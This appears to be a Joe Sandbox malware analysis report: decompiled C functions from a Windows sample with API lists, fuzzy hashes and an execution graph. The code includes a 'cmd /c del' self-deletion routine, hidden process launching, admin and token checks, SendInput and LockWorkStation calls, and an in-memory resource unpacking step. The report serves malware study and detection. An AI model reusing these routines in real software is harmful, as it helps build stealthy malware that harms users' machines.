    					E00DB3510( &_v24, 0, 0x10);
    					_t49 = 0x44;
    					E00DB3510( &_v92, 0, _t49);
    					_v92.cb = _t49;
    					GetStartupInfoA( &_v92);
    					_v92.wShowWindow = 0;
    					_v92.dwFlags = 1;
    					if(CreateProcessA(0, _t45, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24) == 0) {
    						GetLastError();
    					} else {
    						WaitForSingleObject(_v24.hProcess, 0xffffffff);
    						if(_a4 != 0) {
    							GetExitCodeProcess(_v24.hProcess, _a4);
    						}
    						CloseHandle(_v24.hThread);
    						CloseHandle(_v24);
    						_v8 = 1;
    					}
    					LocalFree(_t45);
    					return _v8;
    				} else {
    					return 0;
    				}
    			}










    0x00db2aff
    0x00db2b06
    0x00db2b0b
    0x00db2b0d
    0x00db2b0d
    0x00db2b0f
    0x00db2b12
    0x00db2b13
    0x00db2b16
    0x00db2b2b
    0x00db2b2f
    0x00db2b3c
    0x00db2b3d
    0x00db2b40
    0x00db2b41
    0x00db2b4d
    0x00db2b54
    0x00db2b5b
    0x00db2b67
    0x00db2b6a
    0x00db2b72
    0x00db2b89
    0x00db2b94
    0x00db2bc7
    0x00db2b96
    0x00db2b9b
    0x00db2ba4
    0x00db2bac
    0x00db2bac
    0x00db2bbb
    0x00db2bc0
    0x00db2bc2
    0x00db2bc2
    0x00db2bce
    0x00000000
    0x00db2b31
    0x00000000
    0x00db2b31

    APIs
    • LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00DB2B25
    • _memset.LIBCMT ref: 00DB2B4D
    • _memset.LIBCMT ref: 00DB2B5B
    • GetStartupInfoA.KERNEL32(?), ref: 00DB2B6A
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00DB2D96), ref: 00DB2B8C
    • WaitForSingleObject.KERNEL32(00DB2D96,000000FF), ref: 00DB2B9B
    • GetExitCodeProcess.KERNEL32(00DB2D96,?), ref: 00DB2BAC
    • CloseHandle.KERNEL32(00000000), ref: 00DB2BBB
    • CloseHandle.KERNEL32(00DB2D96), ref: 00DB2BC0
    • GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00DB2BC7
    • LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00DB2BCE
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: CloseHandleLocalProcess_memset$AllocCodeCreateErrorExitFreeInfoLastObjectSingleStartupWait
    • String ID:
    • API String ID: 3970834964-0
    • Opcode ID: 85792dada8a0099df694c73600d84028ea98295d55e3fe164b250abe3bad4064
    • Instruction ID: d5c0bcb14515542c93c6a62882326f94f51ed8bfbc64ab09e2fe09076eaaebb2
    • Opcode Fuzzy Hash: 85792dada8a0099df694c73600d84028ea98295d55e3fe164b250abe3bad4064
    • Instruction Fuzzy Hash: 3E217C76900258EBCB11AFE4DC89DEF7BBCEF08751F600616F606E6154DA309A80DBB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00DB21ED() {
    				char _v264;
    				char _v524;
    				long _t11;
    
    				_t11 = GetModuleFileNameA(0,  &_v264, 0x104);
    				if(_t11 != 0) {
    					_t11 = GetShortPathNameA( &_v264,  &_v264, 0x104);
    					if(_t11 != 0) {
    						_push( &_v264);
    						_push("/c del %s >> NUL");
    						_push( &_v524);
    						E00DB3E87();
    						_t11 = GetEnvironmentVariableA("ComSpec",  &_v264, 0x104);
    						if(_t11 != 0) {
    							lstrcatA( &_v264, " ");
    							lstrcatA( &_v264,  &_v524);
    							return WinExec( &_v264, 0);
    						}
    					}
    				}
    				return _t11;
    			}






    0x00db2206
    0x00db220e
    0x00db2219
    0x00db2221
    0x00db2229
    0x00db2230
    0x00db2235
    0x00db2236
    0x00db224b
    0x00db2253
    0x00db2267
    0x00db2277
    0x00000000
    0x00db2282
    0x00db2253
    0x00db2221
    0x00db228a

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622DAA3), ref: 00DB2206
    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00DB2219
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 00DB224B
    • lstrcatA.KERNEL32(?,00DB11F0), ref: 00DB2267
    • lstrcatA.KERNEL32(?,?), ref: 00DB2277
    • WinExec.KERNEL32(?,00000000), ref: 00DB2282
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Namelstrcat$EnvironmentExecFileModulePathShortVariable
    • String ID: /c del %s >> NUL$ComSpec
    • API String ID: 4034038632-4153267903
    • Opcode ID: ccada81a69bf922e2eed3c24427f5051204974f0fcdfffbb7bc216e3561bd20e
    • Instruction ID: 3b1105eee2378d601f0afd915292009c63fac4aa1f82011f6311a6608b478cab
    • Opcode Fuzzy Hash: ccada81a69bf922e2eed3c24427f5051204974f0fcdfffbb7bc216e3561bd20e
    • Instruction Fuzzy Hash: 920104BAD00329EBDB10A7A09D89FDB776C9F14740F440691A646E2140DA70DBC48B71
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB250C(void* __ecx, long _a4, void** _a8, long* _a12) {
    				struct _OVERLAPPED* _v8;
    				long _t12;
    				void* _t13;
    				void* _t19;
    				long* _t28;
    
    				_v8 = 0;
    				_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t19 == 0xffffffff) {
    					GetLastError();
    				} else {
    					_t12 = GetFileSize(_t19, 0);
    					_t28 = _a12;
    					 *_t28 = _t12;
    					_t13 = LocalAlloc(0x40, _t12);
    					 *_a8 = _t13;
    					if(_t13 == 0) {
    						GetLastError();
    						 *_t28 = 0;
    					} else {
    						_a4 = 0;
    						if(ReadFile(_t19, _t13,  *_t28,  &_a4, 0) == 0) {
    							GetLastError();
    						} else {
    							_v8 = 1;
    						}
    					}
    					CloseHandle(_t19);
    				}
    				return _v8;
    			}








    0x00db2523
    0x00db252c
    0x00db2531
    0x00db258c
    0x00db2533
    0x00db2536
    0x00db253c
    0x00db2542
    0x00db2544
    0x00db254d
    0x00db2551
    0x00db257a
    0x00db2580
    0x00db2553
    0x00db255a
    0x00db2567
    0x00db2572
    0x00db2569
    0x00db2569
    0x00db2569
    0x00db2567
    0x00db2583
    0x00db2589
    0x00db2598

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
    • GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
    • LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
    • ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
    • GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
    • GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
    • CloseHandle.KERNEL32(00000000), ref: 00DB2583
    • GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorFileLast$AllocCloseCreateHandleLocalReadSize
    • String ID:
    • API String ID: 541326989-0
    • Opcode ID: 6042852f26c1d2fa666eb092c5038f76a4cfc05db097893ddda4a19b1a379c9f
    • Instruction ID: 89c5d48a2ef23092083837a08f284f7525a968d114d72171c01fa20d271125e0
    • Opcode Fuzzy Hash: 6042852f26c1d2fa666eb092c5038f76a4cfc05db097893ddda4a19b1a379c9f
    • Instruction Fuzzy Hash: 5C1127B9900344FFD7206F65DC6CEAB7FB8EB99751F60460CBA43D6290D6719A80CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB2822(intOrPtr _a4) {
    				intOrPtr _v276;
    				intOrPtr _v292;
    				void* _v300;
    				int _t17;
    				void* _t18;
    
    				_t17 = 0;
    				_t18 = CreateToolhelp32Snapshot(2, 0);
    				if(_t18 == 0xffffffff) {
    					GetLastError();
    				} else {
    					_v300 = 0x128;
    					if(Process32First(_t18,  &_v300) == 0) {
    						GetLastError();
    					} else {
    						while(_v292 != _a4) {
    							if(Process32Next(_t18,  &_v300) != 0) {
    								continue;
    							} else {
    							}
    							goto L7;
    						}
    						_t17 = _v276;
    					}
    					L7:
    					CloseHandle(_t18);
    				}
    				return _t17;
    			}








    0x00db282d
    0x00db2837
    0x00db283c
    0x00db288e
    0x00db283e
    0x00db2846
    0x00db2857
    0x00db287f
    0x00db2859
    0x00db2859
    0x00db2873
    0x00000000
    0x00000000
    0x00db2875
    0x00000000
    0x00db2873
    0x00db2877
    0x00db2877
    0x00db2885
    0x00db2886
    0x00db2886
    0x00db2899

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DB2832
    • Process32First.KERNEL32(00000000,?), ref: 00DB2850
    • Process32Next.KERNEL32(00000000,00000128), ref: 00DB286C
    • GetLastError.KERNEL32(00000000,7622D965), ref: 00DB287F
    • CloseHandle.KERNEL32(00000000), ref: 00DB2886
    • GetLastError.KERNEL32(00000000,7622D965), ref: 00DB288E
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLastProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3005108968-0
    • Opcode ID: 9e6ceb100b56e9c4e2e1b77cc03e76231b1d809f0cf1fca677164cdea87c7464
    • Instruction ID: 4881c1760078506343e193c57037dea264cf7a352281528a5754601ef4e15ff0
    • Opcode Fuzzy Hash: 9e6ceb100b56e9c4e2e1b77cc03e76231b1d809f0cf1fca677164cdea87c7464
    • Instruction Fuzzy Hash: ABF0C83B901224EBD7206B698C09EFE77BCDB88361F140154F957D6190DB34DE95CAB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB24AA(long _a4, void* _a8, long _a12) {
    				void* _t14;
    				struct _OVERLAPPED* _t15;
    
    				_t15 = 0;
    				_t14 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0, 0);
    				if(_t14 == 0xffffffff) {
    					GetLastError();
    				} else {
    					_a4 = 0;
    					if(WriteFile(_t14, _a8, _a12,  &_a4, 0) == 0) {
    						GetLastError();
    					} else {
    						_t15 = 1;
    					}
    					FlushFileBuffers(_t14);
    					CloseHandle(_t14);
    				}
    				return _t15;
    			}





    0x00db24af
    0x00db24c5
    0x00db24ca
    0x00db24fe
    0x00db24cc
    0x00db24d4
    0x00db24e3
    0x00db24e8
    0x00db24e5
    0x00db24e5
    0x00db24e5
    0x00db24ef
    0x00db24f6
    0x00db24f6
    0x00db2509

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB24BF
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00DB24DB
    • GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24E8
    • FlushFileBuffers.KERNEL32(00000000), ref: 00DB24EF
    • CloseHandle.KERNEL32(00000000), ref: 00DB24F6
    • GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24FE
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: File$ErrorLast$BuffersCloseCreateFlushHandleWrite
    • String ID:
    • API String ID: 3976640885-0
    • Opcode ID: d42bf88264b1f1af0d5555f32792c8b43265b0265c1c279248a93c24a5e1d020
    • Instruction ID: e76e29dd245e9a37b02283d601b1475e05bc0e7df49dfdf9212ad6446228b679
    • Opcode Fuzzy Hash: d42bf88264b1f1af0d5555f32792c8b43265b0265c1c279248a93c24a5e1d020
    • Instruction Fuzzy Hash: 9CF0E73A505224FBD7212B6AED5CEEB7E28EB567F2B504215FA0AC1660C6308452D6B0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB2062() {
    				void* _t1;
    				_Unknown_base(*)()* _t3;
    
    				if( *0xdb59f4 == 0) {
    					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wvsprintfA");
    					 *0xdb59f4 = _t3;
    					return _t3;
    				}
    				return _t1;
    			}





    0x00db2069
    0x00db207c
    0x00db2082
    0x00000000
    0x00db2082
    0x00db2087

    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 00DB2075
    • GetProcAddress.KERNEL32(00000000), ref: 00DB207C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: user32.dll$wvsprintfA
    • API String ID: 2574300362-1331095676
    • Opcode ID: f6a0156f9df59d0982f104ea266d148bc6664a84edca4314e7e0f7270d714d96
    • Instruction ID: 35705d664b89b8e9a233b68fe4d08d809a6d7f5832746daf93f616ffb028bf2c
    • Opcode Fuzzy Hash: f6a0156f9df59d0982f104ea266d148bc6664a84edca4314e7e0f7270d714d96
    • Instruction Fuzzy Hash: 8CC012BCC02343DECB043B60AD6ABA23AA0A340352F800304A202D8268DA7404448B30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB2088() {
    				void* _t1;
    				_Unknown_base(*)()* _t3;
    
    				if( *0xdb59f8 == 0) {
    					_t3 = GetProcAddress(LoadLibraryA("msvcrt.dll"), "_vscprintf");
    					 *0xdb59f8 = _t3;
    					return _t3;
    				}
    				return _t1;
    			}





    0x00db208f
    0x00db20a2
    0x00db20a8
    0x00000000
    0x00db20a8
    0x00db20ad

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 00DB209B
    • GetProcAddress.KERNEL32(00000000), ref: 00DB20A2
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: _vscprintf$msvcrt.dll
    • API String ID: 2574300362-514782248
    • Opcode ID: 739641149e9b430475518c8c19c6ba9c6245aad15b88abc29c767bbde21ccfd0
    • Instruction ID: 96a605e918392d6e6c1e4581353b934eb871d531371d9fb5a30be976874fadfc
    • Opcode Fuzzy Hash: 739641149e9b430475518c8c19c6ba9c6245aad15b88abc29c767bbde21ccfd0
    • Instruction Fuzzy Hash: 36C012FDC01302DFCB802BA8AC6AB903A60A300392F900224A622E0268D67000848A30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB203C() {
    				void* _t1;
    				_Unknown_base(*)()* _t3;
    
    				if( *0xdb59f0 == 0) {
    					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wsprintfA");
    					 *0xdb59f0 = _t3;
    					return _t3;
    				}
    				return _t1;
    			}





    0x00db2043
    0x00db2056
    0x00db205c
    0x00000000
    0x00db205c
    0x00db2061

    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 00DB204F
    • GetProcAddress.KERNEL32(00000000), ref: 00DB2056
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: user32.dll$wsprintfA
    • API String ID: 2574300362-4095251970
    • Opcode ID: 5534c611db5672023ccfef55dd7ec8259f448405067503136d43e07a5ecd17d1
    • Instruction ID: 6c1c99d635df3d9c9b0844b2985e3743df33ac99333fedb22ce552d2465a1d9c
    • Opcode Fuzzy Hash: 5534c611db5672023ccfef55dd7ec8259f448405067503136d43e07a5ecd17d1
    • Instruction Fuzzy Hash: F3C002BDD41742DEDB116B64AC6AB9536A8B704792F840354B613D1368DB7450848A74
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SendInput.USER32(00000001,?,0000001C), ref: 00DB30FF
    • SendInput.USER32(00000001,?,0000001C), ref: 00DB3114
    • SendInput.USER32(00000001,?,0000001C), ref: 00DB3127
    • SendInput.USER32(00000001,?,0000001C), ref: 00DB313A
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: InputSend
    • String ID:
    • API String ID: 3431551938-0
    • Opcode ID: da012e55dd8ca7d1435825243e218e7613479c7800ca521a270346921aa18f37
    • Instruction ID: e2a41101234043fbde1e124ad1c3e26006e2664bb5a9f4f6cfcc5e4a48740996
    • Opcode Fuzzy Hash: da012e55dd8ca7d1435825243e218e7613479c7800ca521a270346921aa18f37
    • Instruction Fuzzy Hash: 5301B771D5021DAAEB00DFA99C42BFFFBBCEF55B50F10501BA604E6190E2B49A418BE5
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:8.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0.3%
    Total number of Nodes:294
    Total number of Limit Nodes:10

    Graph

    execution_graph 1215 d31fb2 IsBadReadPtr 1216 d31ff4 1215->1216 1220 d31fc4 1215->1220 1223 d31cda 1216->1223 1218 d31fe5 1257 d31e99 1218->1257 1220->1216 1220->1218 1276 d329c6 1223->1276 1225 d31ced _memset 1226 d31d01 GetVersionExA 1225->1226 1227 d31d17 GetVersionExA 1226->1227 1228 d31d2c 1226->1228 1227->1228 1229 d31e8f ExitProcess 1227->1229 1230 d31d35 GetCurrentProcess 1228->1230 1231 d31d4d GetCommandLineA GetModuleHandleA 1228->1231 1296 d3289c 1230->1296 1323 d32308 GetTickCount 1231->1323 1235 d31d7e 1236 d31e8a 1235->1236 1238 d31d8f 1235->1238 1239 d31e7c 1235->1239 1319 d32481 1236->1319 1238->1239 1241 d31d98 IsUserAnAdmin 1238->1241 1314 d322dc 1239->1314 1241->1239 1243 d31da6 GetModuleHandleA GetModuleFileNameA 1241->1243 1334 d3250c CreateFileA 1243->1334 1246 d31e3b 1249 d33e87 3 API calls 1246->1249 1248 d31dfe 1250 d31e68 Sleep LocalFree 1248->1250 1343 d33e87 1248->1343 1251 d31e53 1249->1251 1250->1239 1346 d33143 GetModuleHandleA GetSystemDirectoryA 1251->1346 1258 d31eac GetModuleHandleA GetModuleFileNameA GetCurrentProcessId 1257->1258 1272 d31f60 1257->1272 1263 d31ede 1258->1263 1259 d31f69 OpenEventA 1260 d31f8d GetLastError 1259->1260 1261 d31f7d SetEvent CloseHandle 1259->1261 1262 d31f93 1260->1262 1261->1262 1264 d327dd 2 API calls 1262->1264 1263->1259 1271 d31f18 1263->1271 1265 d31f98 1264->1265 1266 d31f9c GetCurrentProcessId 1265->1266 1275 d31f48 ExitProcess 1265->1275 1537 d32822 CreateToolhelp32Snapshot 1266->1537 1271->1272 1273 d31f35 GetCurrentProcess 1271->1273 1274 d3289c 15 API calls 1273->1274 1274->1275 1398 d33510 1276->1398 1279 d32a07 1281 d32aeb IsUserAnAdmin 1279->1281 1282 d32a1b GetCurrentProcess OpenProcessToken 1279->1282 1280 d329fa GetLastError 1285 d32a00 1280->1285 1281->1285 1283 d32ae1 GetLastError 1282->1283 1284 d32a39 GetTokenInformation 1282->1284 1283->1285 1286 d32a57 GetLastError CloseHandle 1284->1286 1287 d32a68 1284->1287 1285->1225 1286->1285 1288 d32ad2 IsUserAnAdmin 1287->1288 1289 d32a74 GetTokenInformation 1287->1289 1290 d32ada CloseHandle 1288->1290 1289->1286 1291 d32a8c 1289->1291 1290->1285 1292 d32ac5 GetLastError 1291->1292 1293 d32aa8 CheckTokenMembership 1291->1293 1295 d32acb CloseHandle 1292->1295 1293->1292 1294 d32ac0 1293->1294 1294->1295 1295->1290 1297 d31d45 1296->1297 1298 d328bd _memset 1296->1298 1297->1229 1297->1231 1299 d328cf GetVersionExA 1298->1299 1300 d328e5 GetVersionExA 1299->1300 1301 d328fa 1299->1301 1300->1297 1300->1301 1301->1297 1302 d32904 OpenProcessToken 1301->1302 1303 d3291b GetTokenInformation 1302->1303 1304 d329af GetLastError 1302->1304 1305 d32935 GetLastError 1303->1305 1306 d3299e GetLastError 1303->1306 1304->1297 1308 d32942 LocalAlloc 1305->1308 1309 d3299a GetLastError 1305->1309 1307 d329a4 CloseHandle 1306->1307 1307->1297 1308->1306 1310 d32953 GetTokenInformation 1308->1310 1309->1307 1311 d32966 GetSidSubAuthorityCount GetSidSubAuthority 1310->1311 1312 d3298b GetLastError 1310->1312 1313 d32991 LocalFree 1311->1313 1312->1313 1313->1307 1400 d32291 1314->1400 1317 d31e81 1317->1236 1390 d31434 IsUserAnAdmin 1317->1390 1318 d322eb GetLastError CloseHandle 1318->1317 1320 d324a1 ExitProcess 1319->1320 1321 d3248a 1319->1321 1321->1320 1432 d321ed GetModuleFileNameA 1321->1432 1324 d3231f 1323->1324 1325 d322dc 27 API calls 1324->1325 1326 d3232c _memset 1325->1326 1327 d32349 GetVersionExA 1326->1327 1332 d32330 1326->1332 1328 d32370 1327->1328 1329 d3235f GetVersionExA 1327->1329 1330 d32389 GetCommandLineW CommandLineToArgvW 1328->1330 1328->1332 1329->1328 1329->1332 1330->1332 1333 d323a9 1330->1333 1331 d32431 LocalFree 1331->1332 1332->1235 1333->1331 1335 d32533 GetFileSize LocalAlloc 1334->1335 1336 d3258c GetLastError 1334->1336 1337 d32553 ReadFile 1335->1337 1338 d3257a GetLastError 1335->1338 1339 d31dd6 1336->1339 1340 d32572 GetLastError 1337->1340 1341 d32569 1337->1341 1342 d32582 CloseHandle 1338->1342 1339->1239 1339->1246 1339->1248 1340->1342 1341->1342 1342->1339 1439 d3203c 1343->1439 1347 d3318a 1346->1347 1348 d33197 GetTempPathA 1347->1348 1349 d331b8 1348->1349 1350 d331c5 GetTempPathA GetTickCount 1349->1350 1442 d33620 1350->1442 1353 d33216 GetCurrentProcess 1359 d33223 1353->1359 1354 d33248 GetClipboardFormatNameA 1354->1359 1355 d3322d 1355->1250 1356 d332b1 1356->1355 1357 d3250c 8 API calls 1356->1357 1358 d332da 1357->1358 1358->1355 1444 d32f02 1358->1444 1359->1354 1359->1355 1359->1356 1362 d3335d 1365 d324aa 6 API calls 1362->1365 1363 d33307 GetTempPathA GetTickCount 1366 d33620 _strlen 1363->1366 1364 d3334b 1451 d324aa CreateFileA 1364->1451 1368 d3337a LocalFree 1365->1368 1369 d33329 wsprintfA MoveFileA 1366->1369 1368->1355 1371 d33394 1368->1371 1369->1364 1372 d33434 1371->1372 1458 d33065 1371->1458 1463 d327dd GetVersionExA 1372->1463 1376 d33445 1466 d330cd SendInput SendInput SendInput SendInput 1376->1466 1377 d3343d LockWorkStation 1378 d3344c CreateEventA 1377->1378 1380 d33463 GetLastError 1378->1380 1381 d3346b WaitForSingleObject 1378->1381 1380->1355 1383 d33482 CloseHandle GetTempPathA GetTickCount 1381->1383 1384 d3347b 1381->1384 1382 d333c7 GetClipboardFormatNameA 1385 d333a9 1382->1385 1386 d33620 _strlen 1383->1386 1384->1383 1385->1355 1385->1382 1388 d3340f 1385->1388 1387 d334ad wsprintfA MoveFileA CopyFileA 1386->1387 1387->1355 1388->1372 1389 d33416 RegisterWindowMessageA 1388->1389 1389->1380 1389->1388 1391 d32291 25 API calls 1390->1391 1392 d31440 1391->1392 1393 d31463 1392->1393 1394 d31446 GetLastError 1392->1394 1393->1236 1395 d31453 1394->1395 1396 d3145d CloseHandle 1394->1396 1467 d313d0 FindResourceA 1395->1467 1396->1393 1399 d329e6 GetVersionExA 1398->1399 1399->1279 1399->1280 1401 d322a6 _memset 1400->1401 1407 d32604 AllocateAndInitializeSid 1401->1407 1404 d322d7 1404->1317 1404->1318 1405 d322bb CreateMutexA 1405->1404 1406 d322d1 GetLastError 1405->1406 1406->1404 1408 d3263b _memset 1407->1408 1409 d327ce GetLastError 1407->1409 1411 d3264a SetEntriesInAclA 1408->1411 1410 d322b7 1409->1410 1410->1404 1410->1405 1412 d32686 LocalAlloc 1411->1412 1413 d327bd GetLastError 1411->1413 1414 d327b0 GetLastError 1412->1414 1416 d326a3 _memset 1412->1416 1415 d327c3 FreeSid 1413->1415 1417 d327b6 LocalFree 1414->1417 1415->1410 1418 d326ac InitializeSecurityDescriptor 1416->1418 1417->1415 1419 d327a3 GetLastError LocalFree 1418->1419 1420 d326c2 SetSecurityDescriptorDacl 1418->1420 1419->1417 1420->1419 1421 d326d9 LoadLibraryA GetProcAddress 1420->1421 1422 d32704 LocalAlloc 1421->1422 1423 d3278c 1421->1423 1424 d32786 GetLastError 1422->1424 1425 d32714 InitializeAcl 1422->1425 1423->1410 1424->1423 1426 d32722 AllocateAndInitializeSid 1425->1426 1427 d32777 GetLastError 1425->1427 1426->1427 1428 d32745 1426->1428 1429 d3277d LocalFree 1427->1429 1430 d32766 GetLastError FreeSid 1428->1430 1431 d32755 SetSecurityDescriptorSacl 1428->1431 1429->1423 1430->1429 1431->1423 1431->1430 1433 d32210 GetShortPathNameA 1432->1433 1434 d32288 1432->1434 1433->1434 1435 d32223 1433->1435 1434->1320 1436 d33e87 3 API calls 1435->1436 1437 d3223b GetEnvironmentVariableA 1436->1437 1437->1434 1438 d32255 lstrcatA lstrcatA WinExec 1437->1438 1438->1434 1440 d32061 wsprintfA 1439->1440 1441 d32045 LoadLibraryA GetProcAddress 1439->1441 1441->1440 1443 d331e7 wsprintfA GetModuleHandleA GetProcAddress 1442->1443 1443->1353 1443->1359 1446 d32f21 1444->1446 1445 d32f67 1445->1362 1445->1363 1445->1364 1446->1445 1447 d32f8e GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1446->1447 1448 d32fcd 1447->1448 1449 d3300d CheckSumMappedFile 1448->1449 1449->1445 1450 d33055 GetLastError 1449->1450 1450->1445 1452 d324fe GetLastError 1451->1452 1453 d324cc WriteFile 1451->1453 1456 d32504 1452->1456 1454 d324e5 1453->1454 1455 d324e8 GetLastError 1453->1455 1457 d324ee FlushFileBuffers CloseHandle 1454->1457 1455->1457 1456->1362 1457->1456 1459 d3307c 1458->1459 1460 d330a0 RegisterClassExA 1459->1460 1461 d330b2 UnregisterClassA 1460->1461 1462 d330c0 1460->1462 1461->1460 1461->1462 1462->1385 1464 d32801 1463->1464 1465 d32818 GetLastError 1463->1465 1464->1376 1464->1377 1465->1464 1466->1378 1468 d313e2 LoadResource 1467->1468 1469 d3142c 1467->1469 1468->1469 1470 d313ef LockResource 1468->1470 1469->1396 1476 d314f3 VirtualAlloc 1470->1476 1472 d31408 1472->1469 1477 d31a94 1472->1477 1476->1472 1478 d31ab4 1477->1478 1491 d31426 